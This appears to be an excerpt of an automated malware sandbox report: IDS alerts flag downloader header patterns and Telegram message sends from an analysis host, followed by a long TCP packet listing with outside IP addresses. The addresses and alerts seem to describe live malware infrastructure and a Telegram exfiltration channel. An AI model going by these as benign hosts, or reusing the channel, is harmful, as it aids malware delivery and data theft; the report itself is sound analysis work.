2025-01-06T07:58:19.481027+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49760	132.226.247.73	80	TCP
2025-01-06T07:58:21.308292+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49764	188.114.97.3	443	TCP
2025-01-06T07:58:22.676934+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49766	188.114.97.3	443	TCP
2025-01-06T07:58:23.645597+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49767	132.226.247.73	80	TCP
2025-01-06T07:58:23.983666+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49769	188.114.97.3	443	TCP
2025-01-06T07:58:25.051857+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49767	132.226.247.73	80	TCP
2025-01-06T07:58:25.633125+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49774	188.114.97.3	443	TCP
2025-01-06T07:58:26.379982+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49776	132.226.247.73	80	TCP
2025-01-06T07:58:26.621410+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49777	188.114.97.3	443	TCP
2025-01-06T07:58:26.923112+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49778	188.114.97.3	443	TCP
2025-01-06T07:58:27.919444+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49781	188.114.97.3	443	TCP
2025-01-06T07:58:28.807005+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.4	49783	149.154.167.220	443	TCP
2025-01-06T07:58:32.128003+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49789	188.114.97.3	443	TCP
2025-01-06T07:58:33.543273+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49791	188.114.97.3	443	TCP
2025-01-06T07:58:35.765047+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.4	49794	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 6, 2025 07:57:56.809441090 CET	49730	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:56.814307928 CET	80	49730	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:56.814398050 CET	49730	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:56.814558983 CET	49730	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:56.819528103 CET	80	49730	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:56.819586992 CET	49730	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:56.864469051 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:56.869359970 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:56.869462013 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:56.888030052 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:56.892924070 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.752257109 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.752273083 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.752285004 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.752290964 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.752304077 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.752315998 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.752326965 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.752343893 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.752352953 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.752365112 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.752419949 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:57.752459049 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:57.757352114 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.757366896 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.757376909 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.757390976 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.757411957 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:57.757441998 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:57.971075058 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.971093893 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.971107006 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.971117973 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.971132040 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.971142054 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:57.971199989 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:57.971366882 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.971379042 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.971390963 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.971402884 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.971405029 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:57.971446037 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:57.972004890 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.972016096 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.972052097 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:57.972135067 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.972215891 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.972215891 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:57.972229004 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.972240925 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.972254038 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.972268105 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:57.972292900 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:57.973000050 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.973011017 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.973031044 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.973042011 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.973051071 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:57.973056078 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.973098993 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:57.973890066 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.973902941 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.973913908 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:57.973934889 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:57.973958969 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:57.976037979 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.028938055 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.189769030 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.189893961 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.189903975 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.189909935 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.189914942 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.189923048 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.190130949 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.190140963 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.190154076 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.190205097 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.190205097 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.190443993 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.190454960 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.190464973 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.190718889 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.190731049 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.190747023 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.190747976 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.190758944 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.190769911 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.190778017 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.190793991 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.191231012 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.191242933 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.191248894 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.191287994 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.191296101 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.191319942 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.191358089 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.191780090 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.191791058 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.191797018 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.191831112 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.191833019 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.191844940 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.191857100 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.191868067 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.191869020 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.191879988 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.191920042 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.192728043 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.192740917 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.192747116 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.192785978 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.192791939 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.192801952 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.192814112 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.192825079 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.192835093 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.192837000 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.192859888 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.192884922 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.193671942 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.193687916 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.193708897 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.193718910 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.193728924 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.193734884 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.193739891 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.193742990 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.193747044 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.193790913 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.194595098 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.194645882 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.198103905 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.408533096 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.408570051 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.408580065 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.408591986 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.408601999 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.408613920 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.408736944 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.408746958 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.408790112 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.408791065 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.408813000 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.408826113 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.408835888 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.408843994 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.408849001 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.408868074 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.408900023 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.409085035 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.409096003 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.409106016 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.409117937 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.409128904 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.409130096 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.409151077 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.409403086 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.409414053 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.409423113 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.409434080 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.409446001 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.409446955 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.409466982 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.409490108 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.409585953 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.409596920 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.409611940 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.409622908 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.409632921 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.409642935 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.409662008 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.409938097 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.409946918 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.409989119 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.409993887 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.410001040 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.410012007 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.410027981 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.410048008 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.410150051 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.410164118 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.410168886 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.410207987 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.410208941 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.410227060 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.410247087 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.410531044 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.410542011 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.410551071 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.410562992 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.410572052 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.410592079 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.410696030 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.410712004 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.410722017 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.410734892 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.410753965 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.410757065 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.410798073 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.410815001 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.410825968 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.410835028 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.410837889 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.410859108 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.411326885 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.411338091 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.411343098 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.411348104 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.411354065 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.411375999 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.411386013 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.411395073 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.411396980 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.411408901 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.411418915 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.411427021 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.411431074 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.411444902 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.411452055 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.411454916 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.411467075 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.411468029 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.411489010 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.412168026 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.412179947 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.412190914 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.412206888 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.412241936 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.412271023 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.412496090 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.412606955 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.412643909 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.412653923 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.412679911 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.412719965 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.412735939 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.412761927 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.412777901 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.412795067 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.412796974 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.412811995 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.412827969 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.412832022 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.412849903 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.412868977 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.413269043 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.413288116 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.413300037 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.413312912 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.413322926 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.413326025 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.413337946 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.413345098 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.413353920 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.413367033 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.413381100 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.413381100 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.413400888 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.413418055 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.416769981 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.495280981 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.495309114 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.495331049 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.495342016 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.495354891 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.495367050 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.495373964 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.495383978 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.495407104 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.495419025 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.495429039 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.495440960 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.495451927 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.495464087 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.495500088 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.495500088 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.495500088 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.495500088 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.495500088 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.495500088 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.627510071 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.627528906 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.627540112 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.627556086 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.627568007 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.627578020 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.627589941 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.627602100 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.627612114 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.627705097 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.627705097 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.627724886 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.627747059 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.627758026 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.627768993 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.627768993 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.627782106 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.627794027 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.627798080 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.627832890 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.627881050 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.627893925 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.627904892 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.627926111 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.627950907 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.628050089 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.628067017 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.628101110 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.628210068 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.628221989 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.628232002 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.628278017 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.628356934 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.628367901 CET	80	49731	166.62.27.188	192.168.2.4
